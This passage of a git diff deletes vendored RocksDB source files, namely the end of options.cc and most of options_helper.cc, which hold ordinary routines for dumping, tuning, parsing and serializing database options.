-                     compaction_options_fifo.ttl);
-    std::string collector_names;
-    for (const auto& collector_factory : table_properties_collector_factories) {
-      collector_names.append(collector_factory->Name());
-      collector_names.append("; ");
-    }
-    ROCKS_LOG_HEADER(
-        log, "                  Options.table_properties_collectors: %s",
-        collector_names.c_str());
-    ROCKS_LOG_HEADER(log,
-                     "                  Options.inplace_update_support: %d",
-                     inplace_update_support);
-    ROCKS_LOG_HEADER(
-        log,
-        "                Options.inplace_update_num_locks: %" ROCKSDB_PRIszt,
-        inplace_update_num_locks);
-    // TODO: easier config for bloom (maybe based on avg key/value size)
-    ROCKS_LOG_HEADER(
-        log, "              Options.memtable_prefix_bloom_size_ratio: %f",
-        memtable_prefix_bloom_size_ratio);
-
-    ROCKS_LOG_HEADER(log, "  Options.memtable_huge_page_size: %" ROCKSDB_PRIszt,
-                     memtable_huge_page_size);
-    ROCKS_LOG_HEADER(log,
-                     "                          Options.bloom_locality: %d",
-                     bloom_locality);
-
-    ROCKS_LOG_HEADER(
-        log,
-        "                   Options.max_successive_merges: %" ROCKSDB_PRIszt,
-        max_successive_merges);
-    ROCKS_LOG_HEADER(log,
-                     "               Options.optimize_filters_for_hits: %d",
-                     optimize_filters_for_hits);
-    ROCKS_LOG_HEADER(log, "               Options.paranoid_file_checks: %d",
-                     paranoid_file_checks);
-    ROCKS_LOG_HEADER(log, "               Options.force_consistency_checks: %d",
-                     force_consistency_checks);
-    ROCKS_LOG_HEADER(log, "               Options.report_bg_io_stats: %d",
-                     report_bg_io_stats);
-}  // ColumnFamilyOptions::Dump
-
-void Options::Dump(Logger* log) const {
-  DBOptions::Dump(log);
-  ColumnFamilyOptions::Dump(log);
-}   // Options::Dump
-
-void Options::DumpCFOptions(Logger* log) const {
-  ColumnFamilyOptions::Dump(log);
-}  // Options::DumpCFOptions
-
-//
-// The goal of this method is to create a configuration that
-// allows an application to write all files into L0 and
-// then do a single compaction to output all files into L1.
-Options*
-Options::PrepareForBulkLoad()
-{
-  // never slowdown ingest.
-  level0_file_num_compaction_trigger = (1<<30);
-  level0_slowdown_writes_trigger = (1<<30);
-  level0_stop_writes_trigger = (1<<30);
-  soft_pending_compaction_bytes_limit = 0;
-  hard_pending_compaction_bytes_limit = 0;
-
-  // no auto compactions please. The application should issue a
-  // manual compaction after all data is loaded into L0.
-  disable_auto_compactions = true;
-  // A manual compaction run should pick all files in L0 in
-  // a single compaction run.
-  max_compaction_bytes = (static_cast<uint64_t>(1) << 60);
-
-  // It is better to have only 2 levels, otherwise a manual
-  // compaction would compact at every possible level, thereby
-  // increasing the total time needed for compactions.
-  num_levels = 2;
-
-  // Need to allow more write buffers to allow more parallism
-  // of flushes.
-  max_write_buffer_number = 6;
-  min_write_buffer_number_to_merge = 1;
-
-  // When compaction is disabled, more parallel flush threads can
-  // help with write throughput.
-  max_background_flushes = 4;
-
-  // Prevent a memtable flush to automatically promote files
-  // to L1. This is helpful so that all files that are
-  // input to the manual compaction are all at L0.
-  max_background_compactions = 2;
-
-  // The compaction would create large files in L1.
-  target_file_size_base = 256 * 1024 * 1024;
-  return this;
-}
-
-Options* Options::OptimizeForSmallDb() {
-  ColumnFamilyOptions::OptimizeForSmallDb();
-  DBOptions::OptimizeForSmallDb();
-  return this;
-}
-
-Options* Options::OldDefaults(int rocksdb_major_version,
-                              int rocksdb_minor_version) {
-  ColumnFamilyOptions::OldDefaults(rocksdb_major_version,
-                                   rocksdb_minor_version);
-  DBOptions::OldDefaults(rocksdb_major_version, rocksdb_minor_version);
-  return this;
-}
-
-DBOptions* DBOptions::OldDefaults(int rocksdb_major_version,
-                                  int rocksdb_minor_version) {
-  if (rocksdb_major_version < 4 ||
-      (rocksdb_major_version == 4 && rocksdb_minor_version < 7)) {
-    max_file_opening_threads = 1;
-    table_cache_numshardbits = 4;
-  }
-  if (rocksdb_major_version < 5 ||
-      (rocksdb_major_version == 5 && rocksdb_minor_version < 2)) {
-    delayed_write_rate = 2 * 1024U * 1024U;
-  } else if (rocksdb_major_version < 5 ||
-             (rocksdb_major_version == 5 && rocksdb_minor_version < 6)) {
-    delayed_write_rate = 16 * 1024U * 1024U;
-  }
-  max_open_files = 5000;
-  wal_recovery_mode = WALRecoveryMode::kTolerateCorruptedTailRecords;
-  return this;
-}
-
-ColumnFamilyOptions* ColumnFamilyOptions::OldDefaults(
-    int rocksdb_major_version, int rocksdb_minor_version) {
-  if (rocksdb_major_version < 4 ||
-      (rocksdb_major_version == 4 && rocksdb_minor_version < 7)) {
-    write_buffer_size = 4 << 20;
-    target_file_size_base = 2 * 1048576;
-    max_bytes_for_level_base = 10 * 1048576;
-    soft_pending_compaction_bytes_limit = 0;
-    hard_pending_compaction_bytes_limit = 0;
-  }
-  if (rocksdb_major_version < 5) {
-    level0_stop_writes_trigger = 24;
-  } else if (rocksdb_major_version == 5 && rocksdb_minor_version < 2) {
-    level0_stop_writes_trigger = 30;
-  }
-  compaction_pri = CompactionPri::kByCompensatedSize;
-
-  return this;
-}
-
-// Optimization functions
-DBOptions* DBOptions::OptimizeForSmallDb() {
-  max_file_opening_threads = 1;
-  max_open_files = 5000;
-  return this;
-}
-
-ColumnFamilyOptions* ColumnFamilyOptions::OptimizeForSmallDb() {
-  write_buffer_size = 2 << 20;
-  target_file_size_base = 2 * 1048576;
-  max_bytes_for_level_base = 10 * 1048576;
-  soft_pending_compaction_bytes_limit = 256 * 1048576;
-  hard_pending_compaction_bytes_limit = 1073741824ul;
-  return this;
-}
-
-#ifndef ROCKSDB_LITE
-ColumnFamilyOptions* ColumnFamilyOptions::OptimizeForPointLookup(
-    uint64_t block_cache_size_mb) {
-  prefix_extractor.reset(NewNoopTransform());
-  BlockBasedTableOptions block_based_options;
-  block_based_options.index_type = BlockBasedTableOptions::kHashSearch;
-  block_based_options.filter_policy.reset(NewBloomFilterPolicy(10));
-  block_based_options.block_cache =
-      NewLRUCache(static_cast<size_t>(block_cache_size_mb * 1024 * 1024));
-  table_factory.reset(new BlockBasedTableFactory(block_based_options));
-  memtable_prefix_bloom_size_ratio = 0.02;
-  return this;
-}
-
-ColumnFamilyOptions* ColumnFamilyOptions::OptimizeLevelStyleCompaction(
-    uint64_t memtable_memory_budget) {
-  write_buffer_size = static_cast<size_t>(memtable_memory_budget / 4);
-  // merge two memtables when flushing to L0
-  min_write_buffer_number_to_merge = 2;
-  // this means we'll use 50% extra memory in the worst case, but will reduce
-  // write stalls.
-  max_write_buffer_number = 6;
-  // start flushing L0->L1 as soon as possible. each file on level0 is
-  // (memtable_memory_budget / 2). This will flush level 0 when it's bigger than
-  // memtable_memory_budget.
-  level0_file_num_compaction_trigger = 2;
-  // doesn't really matter much, but we don't want to create too many files
-  target_file_size_base = memtable_memory_budget / 8;
-  // make Level1 size equal to Level0 size, so that L0->L1 compactions are fast
-  max_bytes_for_level_base = memtable_memory_budget;
-
-  // level style compaction
-  compaction_style = kCompactionStyleLevel;
-
-  // only compress levels >= 2
-  compression_per_level.resize(num_levels);
-  for (int i = 0; i < num_levels; ++i) {
-    if (i < 2) {
-      compression_per_level[i] = kNoCompression;
-    } else {
-      compression_per_level[i] = kSnappyCompression;
-    }
-  }
-  return this;
-}
-
-ColumnFamilyOptions* ColumnFamilyOptions::OptimizeUniversalStyleCompaction(
-    uint64_t memtable_memory_budget) {
-  write_buffer_size = static_cast<size_t>(memtable_memory_budget / 4);
-  // merge two memtables when flushing to L0
-  min_write_buffer_number_to_merge = 2;
-  // this means we'll use 50% extra memory in the worst case, but will reduce
-  // write stalls.
-  max_write_buffer_number = 6;
-  // universal style compaction
-  compaction_style = kCompactionStyleUniversal;
-  compaction_options_universal.compression_size_percent = 80;
-  return this;
-}
-
-DBOptions* DBOptions::IncreaseParallelism(int total_threads) {
-  max_background_compactions = total_threads - 1;
-  max_background_flushes = 1;
-  env->SetBackgroundThreads(total_threads, Env::LOW);
-  env->SetBackgroundThreads(1, Env::HIGH);
-  return this;
-}
-
-#endif  // !ROCKSDB_LITE
-
-ReadOptions::ReadOptions()
-    : snapshot(nullptr),
-      iterate_upper_bound(nullptr),
-      readahead_size(0),
-      max_skippable_internal_keys(0),
-      read_tier(kReadAllTier),
-      verify_checksums(true),
-      fill_cache(true),
-      tailing(false),
-      managed(false),
-      total_order_seek(false),
-      prefix_same_as_start(false),
-      pin_data(false),
-      background_purge_on_iterator_cleanup(false),
-      ignore_range_deletions(false) {}
-
-ReadOptions::ReadOptions(bool cksum, bool cache)
-    : snapshot(nullptr),
-      iterate_upper_bound(nullptr),
-      readahead_size(0),
-      max_skippable_internal_keys(0),
-      read_tier(kReadAllTier),
-      verify_checksums(cksum),
-      fill_cache(cache),
-      tailing(false),
-      managed(false),
-      total_order_seek(false),
-      prefix_same_as_start(false),
-      pin_data(false),
-      background_purge_on_iterator_cleanup(false),
-      ignore_range_deletions(false) {}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/options_helper.cc b/thirdparty/rocksdb/options/options_helper.cc
deleted file mode 100644
index 5cf548f..0000000
--- a/thirdparty/rocksdb/options/options_helper.cc
+++ /dev/null
@@ -1,1133 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#include "options/options_helper.h"
-
-#include <cassert>
-#include <cctype>
-#include <cstdlib>
-#include <unordered_set>
-#include <vector>
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_factory.h"
-#include "table/plain_table_factory.h"
-#include "util/cast_util.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-DBOptions BuildDBOptions(const ImmutableDBOptions& immutable_db_options,
-                         const MutableDBOptions& mutable_db_options) {
-  DBOptions options;
-
-  options.create_if_missing = immutable_db_options.create_if_missing;
-  options.create_missing_column_families =
-      immutable_db_options.create_missing_column_families;
-  options.error_if_exists = immutable_db_options.error_if_exists;
-  options.paranoid_checks = immutable_db_options.paranoid_checks;
-  options.env = immutable_db_options.env;
-  options.rate_limiter = immutable_db_options.rate_limiter;
-  options.sst_file_manager = immutable_db_options.sst_file_manager;
-  options.info_log = immutable_db_options.info_log;
-  options.info_log_level = immutable_db_options.info_log_level;
-  options.max_open_files = mutable_db_options.max_open_files;
-  options.max_file_opening_threads =
-      immutable_db_options.max_file_opening_threads;
-  options.max_total_wal_size = mutable_db_options.max_total_wal_size;
-  options.statistics = immutable_db_options.statistics;
-  options.use_fsync = immutable_db_options.use_fsync;
-  options.db_paths = immutable_db_options.db_paths;
-  options.db_log_dir = immutable_db_options.db_log_dir;
-  options.wal_dir = immutable_db_options.wal_dir;
-  options.delete_obsolete_files_period_micros =
-      mutable_db_options.delete_obsolete_files_period_micros;
-  options.max_background_jobs = mutable_db_options.max_background_jobs;
-  options.base_background_compactions =
-      mutable_db_options.base_background_compactions;
-  options.max_background_compactions =
-      mutable_db_options.max_background_compactions;
-  options.max_subcompactions = immutable_db_options.max_subcompactions;
-  options.max_background_flushes = immutable_db_options.max_background_flushes;
-  options.max_log_file_size = immutable_db_options.max_log_file_size;
-  options.log_file_time_to_roll = immutable_db_options.log_file_time_to_roll;
-  options.keep_log_file_num = immutable_db_options.keep_log_file_num;
-  options.recycle_log_file_num = immutable_db_options.recycle_log_file_num;
-  options.max_manifest_file_size = immutable_db_options.max_manifest_file_size;
-  options.table_cache_numshardbits =
-      immutable_db_options.table_cache_numshardbits;
-  options.WAL_ttl_seconds = immutable_db_options.wal_ttl_seconds;
-  options.WAL_size_limit_MB = immutable_db_options.wal_size_limit_mb;
-  options.manifest_preallocation_size =
-      immutable_db_options.manifest_preallocation_size;
-  options.allow_mmap_reads = immutable_db_options.allow_mmap_reads;
-  options.allow_mmap_writes = immutable_db_options.allow_mmap_writes;
-  options.use_direct_reads = immutable_db_options.use_direct_reads;
-  options.use_direct_io_for_flush_and_compaction =
-      immutable_db_options.use_direct_io_for_flush_and_compaction;
-  options.allow_fallocate = immutable_db_options.allow_fallocate;
-  options.is_fd_close_on_exec = immutable_db_options.is_fd_close_on_exec;
-  options.stats_dump_period_sec = mutable_db_options.stats_dump_period_sec;
-  options.advise_random_on_open = immutable_db_options.advise_random_on_open;
-  options.db_write_buffer_size = immutable_db_options.db_write_buffer_size;
-  options.write_buffer_manager = immutable_db_options.write_buffer_manager;
-  options.access_hint_on_compaction_start =
-      immutable_db_options.access_hint_on_compaction_start;
-  options.new_table_reader_for_compaction_inputs =
-      immutable_db_options.new_table_reader_for_compaction_inputs;
-  options.compaction_readahead_size =
-      immutable_db_options.compaction_readahead_size;
-  options.random_access_max_buffer_size =
-      immutable_db_options.random_access_max_buffer_size;
-  options.writable_file_max_buffer_size =
-      immutable_db_options.writable_file_max_buffer_size;
-  options.use_adaptive_mutex = immutable_db_options.use_adaptive_mutex;
-  options.bytes_per_sync = immutable_db_options.bytes_per_sync;
-  options.wal_bytes_per_sync = immutable_db_options.wal_bytes_per_sync;
-  options.listeners = immutable_db_options.listeners;
-  options.enable_thread_tracking = immutable_db_options.enable_thread_tracking;
-  options.delayed_write_rate = mutable_db_options.delayed_write_rate;
-  options.allow_concurrent_memtable_write =
-      immutable_db_options.allow_concurrent_memtable_write;
-  options.enable_write_thread_adaptive_yield =
-      immutable_db_options.enable_write_thread_adaptive_yield;
-  options.write_thread_max_yield_usec =
-      immutable_db_options.write_thread_max_yield_usec;
-  options.write_thread_slow_yield_usec =
-      immutable_db_options.write_thread_slow_yield_usec;
-  options.skip_stats_update_on_db_open =
-      immutable_db_options.skip_stats_update_on_db_open;
-  options.wal_recovery_mode = immutable_db_options.wal_recovery_mode;
-  options.allow_2pc = immutable_db_options.allow_2pc;
-  options.row_cache = immutable_db_options.row_cache;
-#ifndef ROCKSDB_LITE
-  options.wal_filter = immutable_db_options.wal_filter;
-#endif  // ROCKSDB_LITE
-  options.fail_if_options_file_error =
-      immutable_db_options.fail_if_options_file_error;
-  options.dump_malloc_stats = immutable_db_options.dump_malloc_stats;
-  options.avoid_flush_during_recovery =
-      immutable_db_options.avoid_flush_during_recovery;
-  options.avoid_flush_during_shutdown =
-      mutable_db_options.avoid_flush_during_shutdown;
-  options.allow_ingest_behind =
-      immutable_db_options.allow_ingest_behind;
-
-  return options;
-}
-
-ColumnFamilyOptions BuildColumnFamilyOptions(
-    const ColumnFamilyOptions& options,
-    const MutableCFOptions& mutable_cf_options) {
-  ColumnFamilyOptions cf_opts(options);
-
-  // Memtable related options
-  cf_opts.write_buffer_size = mutable_cf_options.write_buffer_size;
-  cf_opts.max_write_buffer_number = mutable_cf_options.max_write_buffer_number;
-  cf_opts.arena_block_size = mutable_cf_options.arena_block_size;
-  cf_opts.memtable_prefix_bloom_size_ratio =
-      mutable_cf_options.memtable_prefix_bloom_size_ratio;
-  cf_opts.memtable_huge_page_size = mutable_cf_options.memtable_huge_page_size;
-  cf_opts.max_successive_merges = mutable_cf_options.max_successive_merges;
-  cf_opts.inplace_update_num_locks =
-      mutable_cf_options.inplace_update_num_locks;
-
-  // Compaction related options
-  cf_opts.disable_auto_compactions =
-      mutable_cf_options.disable_auto_compactions;
-  cf_opts.level0_file_num_compaction_trigger =
-      mutable_cf_options.level0_file_num_compaction_trigger;
-  cf_opts.level0_slowdown_writes_trigger =
-      mutable_cf_options.level0_slowdown_writes_trigger;
-  cf_opts.level0_stop_writes_trigger =
-      mutable_cf_options.level0_stop_writes_trigger;
-  cf_opts.max_compaction_bytes = mutable_cf_options.max_compaction_bytes;
-  cf_opts.target_file_size_base = mutable_cf_options.target_file_size_base;
-  cf_opts.target_file_size_multiplier =
-      mutable_cf_options.target_file_size_multiplier;
-  cf_opts.max_bytes_for_level_base =
-      mutable_cf_options.max_bytes_for_level_base;
-  cf_opts.max_bytes_for_level_multiplier =
-      mutable_cf_options.max_bytes_for_level_multiplier;
-
-  cf_opts.max_bytes_for_level_multiplier_additional.clear();
-  for (auto value :
-       mutable_cf_options.max_bytes_for_level_multiplier_additional) {
-    cf_opts.max_bytes_for_level_multiplier_additional.emplace_back(value);
-  }
-
-  // Misc options
-  cf_opts.max_sequential_skip_in_iterations =
-      mutable_cf_options.max_sequential_skip_in_iterations;
-  cf_opts.paranoid_file_checks = mutable_cf_options.paranoid_file_checks;
-  cf_opts.report_bg_io_stats = mutable_cf_options.report_bg_io_stats;
-  cf_opts.compression = mutable_cf_options.compression;
-
-  cf_opts.table_factory = options.table_factory;
-  // TODO(yhchiang): find some way to handle the following derived options
-  // * max_file_size
-
-  return cf_opts;
-}
-
-#ifndef ROCKSDB_LITE
-
-namespace {
-template <typename T>
-bool ParseEnum(const std::unordered_map<std::string, T>& type_map,
-               const std::string& type, T* value) {
-  auto iter = type_map.find(type);
-  if (iter != type_map.end()) {
-    *value = iter->second;
-    return true;
-  }
-  return false;
-}
-
-template <typename T>
-bool SerializeEnum(const std::unordered_map<std::string, T>& type_map,
-                   const T& type, std::string* value) {
-  for (const auto& pair : type_map) {
-    if (pair.second == type) {
-      *value = pair.first;
-      return true;
-    }
-  }
-  return false;
-}
-
-bool SerializeVectorCompressionType(const std::vector<CompressionType>& types,
-                                    std::string* value) {
-  std::stringstream ss;
-  bool result;
-  for (size_t i = 0; i < types.size(); ++i) {
-    if (i > 0) {
-      ss << ':';
-    }
-    std::string string_type;
-    result = SerializeEnum<CompressionType>(compression_type_string_map,
-                                            types[i], &string_type);
-    if (result == false) {
-      return result;
-    }
-    ss << string_type;
-  }
-  *value = ss.str();
-  return true;
-}
-
-bool ParseVectorCompressionType(
-    const std::string& value,
-    std::vector<CompressionType>* compression_per_level) {
-  compression_per_level->clear();
-  size_t start = 0;
-  while (start < value.size()) {
-    size_t end = value.find(':', start);
-    bool is_ok;
-    CompressionType type;
-    if (end == std::string::npos) {
-      is_ok = ParseEnum<CompressionType>(compression_type_string_map,
-                                         value.substr(start), &type);
-      if (!is_ok) {
-        return false;
-      }
-      compression_per_level->emplace_back(type);
-      break;
-    } else {
-      is_ok = ParseEnum<CompressionType>(
-          compression_type_string_map, value.substr(start, end - start), &type);
-      if (!is_ok) {
-        return false;
-      }
-      compression_per_level->emplace_back(type);
-      start = end + 1;
-    }
-  }
-  return true;
-}
-
-bool ParseSliceTransformHelper(
-    const std::string& kFixedPrefixName, const std::string& kCappedPrefixName,
-    const std::string& value,
-    std::shared_ptr<const SliceTransform>* slice_transform) {
-
-  auto& pe_value = value;
-  if (pe_value.size() > kFixedPrefixName.size() &&
-      pe_value.compare(0, kFixedPrefixName.size(), kFixedPrefixName) == 0) {
-    int prefix_length = ParseInt(trim(value.substr(kFixedPrefixName.size())));
-    slice_transform->reset(NewFixedPrefixTransform(prefix_length));
-  } else if (pe_value.size() > kCappedPrefixName.size() &&
-             pe_value.compare(0, kCappedPrefixName.size(), kCappedPrefixName) ==
-                 0) {
-    int prefix_length =
-        ParseInt(trim(pe_value.substr(kCappedPrefixName.size())));
-    slice_transform->reset(NewCappedPrefixTransform(prefix_length));
-  } else if (value == kNullptrString) {
-    slice_transform->reset();
-  } else {
-    return false;
-  }
-
-  return true;
-}
-
-bool ParseSliceTransform(
-    const std::string& value,
-    std::shared_ptr<const SliceTransform>* slice_transform) {
-  // While we normally don't convert the string representation of a
-  // pointer-typed option into its instance, here we do so for backward
-  // compatibility as we allow this action in SetOption().
-
-  // TODO(yhchiang): A possible better place for these serialization /
-  // deserialization is inside the class definition of pointer-typed
-  // option itself, but this requires a bigger change of public API.
-  bool result =
-      ParseSliceTransformHelper("fixed:", "capped:", value, slice_transform);
-  if (result) {
-    return result;
-  }
-  result = ParseSliceTransformHelper(
-      "rocksdb.FixedPrefix.", "rocksdb.CappedPrefix.", value, slice_transform);
-  if (result) {
-    return result;
-  }
-  // TODO(yhchiang): we can further support other default
-  //                 SliceTransforms here.
-  return false;
-}
-}  // anonymouse namespace
-
-bool ParseOptionHelper(char* opt_address, const OptionType& opt_type,
-                       const std::string& value) {
-  switch (opt_type) {
-    case OptionType::kBoolean:
-      *reinterpret_cast<bool*>(opt_address) = ParseBoolean("", value);
-      break;
-    case OptionType::kInt:
-      *reinterpret_cast<int*>(opt_address) = ParseInt(value);
-      break;
-    case OptionType::kVectorInt:
-      *reinterpret_cast<std::vector<int>*>(opt_address) = ParseVectorInt(value);
-      break;
-    case OptionType::kUInt:
-      *reinterpret_cast<unsigned int*>(opt_address) = ParseUint32(value);
-      break;
-    case OptionType::kUInt32T:
-      *reinterpret_cast<uint32_t*>(opt_address) = ParseUint32(value);
-      break;
-    case OptionType::kUInt64T:
-      PutUnaligned(reinterpret_cast<uint64_t*>(opt_address), ParseUint64(value));
-      break;
-    case OptionType::kSizeT:
-      PutUnaligned(reinterpret_cast<size_t*>(opt_address), ParseSizeT(value));
-      break;
-    case OptionType::kString:
-      *reinterpret_cast<std::string*>(opt_address) = value;
-      break;
-    case OptionType::kDouble:
-      *reinterpret_cast<double*>(opt_address) = ParseDouble(value);
-      break;
-    case OptionType::kCompactionStyle:
-      return ParseEnum<CompactionStyle>(
-          compaction_style_string_map, value,
-          reinterpret_cast<CompactionStyle*>(opt_address));
-    case OptionType::kCompactionPri:
-      return ParseEnum<CompactionPri>(
-          compaction_pri_string_map, value,
-          reinterpret_cast<CompactionPri*>(opt_address));
-    case OptionType::kCompressionType:
-      return ParseEnum<CompressionType>(
-          compression_type_string_map, value,
-          reinterpret_cast<CompressionType*>(opt_address));
-    case OptionType::kVectorCompressionType:
-      return ParseVectorCompressionType(
-          value, reinterpret_cast<std::vector<CompressionType>*>(opt_address));
-    case OptionType::kSliceTransform:
-      return ParseSliceTransform(
-          value, reinterpret_cast<std::shared_ptr<const SliceTransform>*>(
-                     opt_address));
-    case OptionType::kChecksumType:
-      return ParseEnum<ChecksumType>(
-          checksum_type_string_map, value,
-          reinterpret_cast<ChecksumType*>(opt_address));
-    case OptionType::kBlockBasedTableIndexType:
-      return ParseEnum<BlockBasedTableOptions::IndexType>(
-          block_base_table_index_type_string_map, value,
-          reinterpret_cast<BlockBasedTableOptions::IndexType*>(opt_address));
-    case OptionType::kEncodingType:
-      return ParseEnum<EncodingType>(
-          encoding_type_string_map, value,
-          reinterpret_cast<EncodingType*>(opt_address));
-    case OptionType::kWALRecoveryMode:
-      return ParseEnum<WALRecoveryMode>(
-          wal_recovery_mode_string_map, value,
-          reinterpret_cast<WALRecoveryMode*>(opt_address));
-    case OptionType::kAccessHint:
-      return ParseEnum<DBOptions::AccessHint>(
-          access_hint_string_map, value,
-          reinterpret_cast<DBOptions::AccessHint*>(opt_address));
-    case OptionType::kInfoLogLevel:
-      return ParseEnum<InfoLogLevel>(
-          info_log_level_string_map, value,
-          reinterpret_cast<InfoLogLevel*>(opt_address));
-    default:
-      return false;
-  }
-  return true;
-}
-
-bool SerializeSingleOptionHelper(const char* opt_address,
-                                 const OptionType opt_type,
-                                 std::string* value) {
-
-  assert(value);
-  switch (opt_type) {
-    case OptionType::kBoolean:
-      *value = *(reinterpret_cast<const bool*>(opt_address)) ? "true" : "false";
-      break;
-    case OptionType::kInt:
-      *value = ToString(*(reinterpret_cast<const int*>(opt_address)));
-      break;
-    case OptionType::kVectorInt:
-      return SerializeIntVector(
-          *reinterpret_cast<const std::vector<int>*>(opt_address), value);
-    case OptionType::kUInt:
-      *value = ToString(*(reinterpret_cast<const unsigned int*>(opt_address)));
-      break;
-    case OptionType::kUInt32T:
-      *value = ToString(*(reinterpret_cast<const uint32_t*>(opt_address)));
-      break;
-    case OptionType::kUInt64T:
-      {
-        uint64_t v;
-        GetUnaligned(reinterpret_cast<const uint64_t*>(opt_address), &v);
-        *value = ToString(v);
-      }
-      break;
-    case OptionType::kSizeT:
-      {
-        size_t v;
-        GetUnaligned(reinterpret_cast<const size_t*>(opt_address), &v);
-        *value = ToString(v);
-      }
-      break;
-    case OptionType::kDouble:
-      *value = ToString(*(reinterpret_cast<const double*>(opt_address)));
-      break;
-    case OptionType::kString:
-      *value = EscapeOptionString(
-          *(reinterpret_cast<const std::string*>(opt_address)));
-      break;
-    case OptionType::kCompactionStyle:
-      return SerializeEnum<CompactionStyle>(
-          compaction_style_string_map,
-          *(reinterpret_cast<const CompactionStyle*>(opt_address)), value);
-    case OptionType::kCompactionPri:
-      return SerializeEnum<CompactionPri>(
-          compaction_pri_string_map,
-          *(reinterpret_cast<const CompactionPri*>(opt_address)), value);
-    case OptionType::kCompressionType:
-      return SerializeEnum<CompressionType>(
-          compression_type_string_map,
-          *(reinterpret_cast<const CompressionType*>(opt_address)), value);
-    case OptionType::kVectorCompressionType:
-      return SerializeVectorCompressionType(
-          *(reinterpret_cast<const std::vector<CompressionType>*>(opt_address)),
-          value);
-      break;
-    case OptionType::kSliceTransform: {
-      const auto* slice_transform_ptr =
-          reinterpret_cast<const std::shared_ptr<const SliceTransform>*>(
-              opt_address);
-      *value = slice_transform_ptr->get() ? slice_transform_ptr->get()->Name()
-                                          : kNullptrString;
-      break;
-    }
-    case OptionType::kTableFactory: {
-      const auto* table_factory_ptr =
-          reinterpret_cast<const std::shared_ptr<const TableFactory>*>(
-              opt_address);
-      *value = table_factory_ptr->get() ? table_factory_ptr->get()->Name()
-                                        : kNullptrString;
-      break;
-    }
-    case OptionType::kComparator: {
-      // it's a const pointer of const Comparator*
-      const auto* ptr = reinterpret_cast<const Comparator* const*>(opt_address);
-      // Since the user-specified comparator will be wrapped by
-      // InternalKeyComparator, we should persist the user-specified one
-      // instead of InternalKeyComparator.
-      if (*ptr == nullptr) {
-        *value = kNullptrString;
-      } else {
-        const Comparator* root_comp = (*ptr)->GetRootComparator();
-        if (root_comp == nullptr) {
-          root_comp = (*ptr);
-        }
-        *value = root_comp->Name();
-      }
-      break;
-    }
-    case OptionType::kCompactionFilter: {
-      // it's a const pointer of const CompactionFilter*
-      const auto* ptr =
-          reinterpret_cast<const CompactionFilter* const*>(opt_address);
-      *value = *ptr ? (*ptr)->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kCompactionFilterFactory: {
-      const auto* ptr =
-          reinterpret_cast<const std::shared_ptr<CompactionFilterFactory>*>(
-              opt_address);
-      *value = ptr->get() ? ptr->get()->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kMemTableRepFactory: {
-      const auto* ptr =
-          reinterpret_cast<const std::shared_ptr<MemTableRepFactory>*>(
-              opt_address);
-      *value = ptr->get() ? ptr->get()->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kMergeOperator: {
-      const auto* ptr =
-          reinterpret_cast<const std::shared_ptr<MergeOperator>*>(opt_address);
-      *value = ptr->get() ? ptr->get()->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kFilterPolicy: {
-      const auto* ptr =
-          reinterpret_cast<const std::shared_ptr<FilterPolicy>*>(opt_address);
-      *value = ptr->get() ? ptr->get()->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kChecksumType:
-      return SerializeEnum<ChecksumType>(
-          checksum_type_string_map,
-          *reinterpret_cast<const ChecksumType*>(opt_address), value);
-    case OptionType::kBlockBasedTableIndexType:
-      return SerializeEnum<BlockBasedTableOptions::IndexType>(
-          block_base_table_index_type_string_map,
-          *reinterpret_cast<const BlockBasedTableOptions::IndexType*>(
-              opt_address),
-          value);
-    case OptionType::kFlushBlockPolicyFactory: {
-      const auto* ptr =
-          reinterpret_cast<const std::shared_ptr<FlushBlockPolicyFactory>*>(
-              opt_address);
-      *value = ptr->get() ? ptr->get()->Name() : kNullptrString;
-      break;
-    }
-    case OptionType::kEncodingType:
-      return SerializeEnum<EncodingType>(
-          encoding_type_string_map,
-          *reinterpret_cast<const EncodingType*>(opt_address), value);
-    case OptionType::kWALRecoveryMode:
-      return SerializeEnum<WALRecoveryMode>(
-          wal_recovery_mode_string_map,
-          *reinterpret_cast<const WALRecoveryMode*>(opt_address), value);
-    case OptionType::kAccessHint:
-      return SerializeEnum<DBOptions::AccessHint>(
-          access_hint_string_map,
-          *reinterpret_cast<const DBOptions::AccessHint*>(opt_address), value);
-    case OptionType::kInfoLogLevel:
-      return SerializeEnum<InfoLogLevel>(
-          info_log_level_string_map,
-          *reinterpret_cast<const InfoLogLevel*>(opt_address), value);
-    default:
-      return false;
-  }
-  return true;
-}
-
-Status GetMutableOptionsFromStrings(
-    const MutableCFOptions& base_options,
-    const std::unordered_map<std::string, std::string>& options_map,
-    MutableCFOptions* new_options) {
-  assert(new_options);
-  *new_options = base_options;
-  for (const auto& o : options_map) {
-    try {
-      auto iter = cf_options_type_info.find(o.first);
-      if (iter == cf_options_type_info.end()) {
-        return Status::InvalidArgument("Unrecognized option: " + o.first);
-      }
-      const auto& opt_info = iter->second;
-      if (!opt_info.is_mutable) {
-        return Status::InvalidArgument("Option not changeable: " + o.first);
-      }
-      bool is_ok = ParseOptionHelper(
-          reinterpret_cast<char*>(new_options) + opt_info.mutable_offset,
-          opt_info.type, o.second);
-      if (!is_ok) {
-        return Status::InvalidArgument("Error parsing " + o.first);
-      }
-    } catch (std::exception& e) {
-      return Status::InvalidArgument("Error parsing " + o.first + ":" +
-                                     std::string(e.what()));
-    }
-  }
-  return Status::OK();
-}
-
-Status GetMutableDBOptionsFromStrings(
-    const MutableDBOptions& base_options,
-    const std::unordered_map<std::string, std::string>& options_map,
-    MutableDBOptions* new_options) {
-  assert(new_options);
-  *new_options = base_options;
-  for (const auto& o : options_map) {
-    try {
-      auto iter = db_options_type_info.find(o.first);
-      if (iter == db_options_type_info.end()) {
